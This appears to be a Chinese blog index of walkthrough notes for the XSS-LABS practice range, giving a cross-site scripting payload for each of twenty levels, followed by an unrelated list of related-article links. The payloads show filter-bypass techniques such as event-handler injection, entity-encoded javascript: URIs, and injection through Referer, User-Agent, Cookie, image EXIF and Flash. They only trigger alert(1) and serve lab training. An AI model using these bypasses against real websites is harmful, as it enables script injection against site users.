当前位置: 首页 > news >正文

XSS - LABS —— 靶场笔记合集

0x01:XSS LABS 靶场初识

  • 0x01:XSS LABS 靶场初识

0x02:XSS LABS 过关思路

  • 0x0201:XSS LABS - Level 1 过关思路
    • Pass Payload:<script>alert(1)</script>
  • 0x0202:XSS LABS - Level 2 过关思路
    • Pass Payload:"><script>alert(1)</script>
  • 0x0203:XSS LABS - Level 3 过关思路
    •  Pass Payload:' onmousemove='alert(1)
    •  备注:htmlspecialchars() 函数在 PHP 8 中默认过滤掉单双引号,可能导致攻击无效。
  • 0x0204:XSS LABS - Level 4 过关思路
    •  Pass Payload:" onmouseover="alert(1)
  • 0x0205:XSS LABS - Level 5 过关思路
    • Pass Payload:"><a href="javascript:alert(1)
    • Pass Payload:"><iframe src=javascript:alert(1); width="0px" height="0px"></iframe><input hidden style="text
  • 0x0206:XSS LABS - Level 6 过关思路
    • Pass Payload:"><ScRiPt>alert(1)</ScRiPt><input hidden value="
  • 0x0207:XSS LABS - Level 7 过关思路
    • Pass Payload:" oonnmouseover="alert(1)
  • 0x0208:XSS LABS - Level 8 过关思路
    • Pass Payload:java&#x0073;cript:alert(1)
  • 0x0209:XSS LABS - Level 9 过关思路
    • Pass Payload:java&#115;cript:alert('http://')
  • 0x0210:XSS LABS - Level 10 过关思路
    • Pass Payload:?t_sort=" onmousemove="alert(1)" type="
  • 0x0211:XSS LABS - Level 11 过关思路
    • Pass Payload:" type="text" onmouseover="alert(1)
    • 备注:注入点在 HTTP 请求包的 Referer 字段上,找准注入参数很重要。
  • 0x0212:XSS LABS - Level 12 过关思路
    • Pass Payload:" type="text" onmouseover="alert(1)
    • 备注:注入点在 HTTP 请求包的 User-Agent 字段上。
  • 0x0213:XSS LABS - Level 13 过关思路
    • Pass Payload:" type="text" onmouseover="alert(1)
    • 备注:注入点在 HTTP 请求包的 Cookie 字段的 user 参数中。
  • 0x0214:XSS LABS - Level 14 过关思路
    • Pass Payload:<script>alert(1)</script>
    • 备注:本关需要通过修改图片的 EXIF 信息完成 XSS 攻击。
  • 0x0215:XSS LABS - Level 15 过关思路
    • Pass Payload:<a href="" onmouseover="alert(1)">
    • 备注:本关需要修改图片内容,将 Payload 携带进图片后,再通过 Angular JS 包含图片进行攻击。
  • 0x0216:XSS LABS - Level 16 过关思路
    • Pass Payload:<input%0atype="text"%0aonmouseover="alert(1)">
    • 备注:在 HTML 中,什么东西与空格等价?
  • 0x0217:XSS LABS - Level 17 过关思路
    • Pass Payload:?arg01=%20onmouseover&arg02=alert(1)
    • 备注:使用 Google 浏览器过关。
  • 0x0218:XSS LABS - Level 18 过关思路
    • Pass Payload:?arg01= onmouseover&arg02=alert(1)
    • 备注:使用 Google 浏览器过关。
  • 0x0219:XSS LABS - Level 19 过关思路
    • Pass Payload:?arg01=version&arg02=<a href='javascript:alert(1)'>Test</a>
    • 备注:本关考察了 Flash XSS,需要使用 JPEXS 对 .swf 文件进行逆向。
  • 0x0220:XSS LABS - Level 20 过关思路
    • Pass Payload:?arg01=id&arg02=id\"));} catch (e) {alert(1);}//%26width=123%26height=123
    • 备注:本关考察了 Flash XSS 中的 ExternalInterface.call 函数,需要掌握该函数在 JS 中的实际运行方式。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Sentinel组件详解:使用与原理
  • 进程间通信:采用有名管道,创建两个发送接收端,父进程写入管道1和管道2,子进程读取管道2和管道1.
  • Python中的赋值运算符:解锁编程的无限可能
  • 加速打开gtihub的工具dev-sidecar
  • 急急急!苹果手机突然黑屏无法开机怎么办?能解决吗?
  • PHPShort轻量级网址缩短程序源码开心版,内含汉化包
  • 微软Win11 22H2/23H2八月可选更新KB5041587发布!
  • Element-plus组件库基础组件使用
  • 如祺出行发布首份中期业绩,总收入增长13.6%
  • ShardingSphere学习笔记
  • Java—可变参数、不可变集合
  • Java面试宝典-java基础04
  • 为啥有时会出现 4.0 - 3.6 = 0.40000001 这种现象?
  • 多机多卡分布式训练的一种简易实现
  • 栈OJ题——栈的压入、弹出序列
  • 【跃迁之路】【641天】程序员高效学习方法论探索系列(实验阶段398-2018.11.14)...
  • CentOS从零开始部署Nodejs项目
  • JavaScript 奇技淫巧
  • Java教程_软件开发基础
  • js学习笔记
  • ucore操作系统实验笔记 - 重新理解中断
  • 初识 beanstalkd
  • 基于Android乐音识别(2)
  • 简单实现一个textarea自适应高度
  • 那些被忽略的 JavaScript 数组方法细节
  • 适配iPhoneX、iPhoneXs、iPhoneXs Max、iPhoneXr 屏幕尺寸及安全区域
  • 思否第一天
  • 移动互联网+智能运营体系搭建=你家有金矿啊!
  • 在Docker Swarm上部署Apache Storm:第1部分
  • ### Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLTr
  • #gStore-weekly | gStore最新版本1.0之三角形计数函数的使用
  • #Linux(帮助手册)
  • #使用清华镜像源 安装/更新 指定版本tensorflow
  • (Charles)如何抓取手机http的报文
  • (备份) esp32 GPIO
  • (二十四)Flask之flask-session组件
  • (附源码)spring boot建达集团公司平台 毕业设计 141538
  • (四)Controller接口控制器详解(三)
  • (转)iOS字体
  • (转)mysql使用Navicat 导出和导入数据库
  • ****Linux下Mysql的安装和配置
  • .env.development、.env.production、.env.staging
  • .Net - 类的介绍
  • .NET Framework与.NET Framework SDK有什么不同?
  • .NET/C# 的字符串暂存池
  • .NET/C# 中你可以在代码中写多个 Main 函数,然后按需要随时切换
  • .NetCore实践篇:分布式监控Zipkin持久化之殇
  • .NET版Word处理控件Aspose.words功能演示:在ASP.NET MVC中创建MS Word编辑器
  • [1] 平面(Plane)图形的生成算法
  • [1159]adb判断手机屏幕状态并点亮屏幕
  • [4.9福建四校联考]
  • [C#]winform部署yolov9的onnx模型
  • [C#]winform基于深度学习算法MVANet部署高精度二分类图像分割onnx模型高精度图像二值化
  • [C#]科学计数法(scientific notation)显示为正常数字
  • [C语言]——分支和循环(4)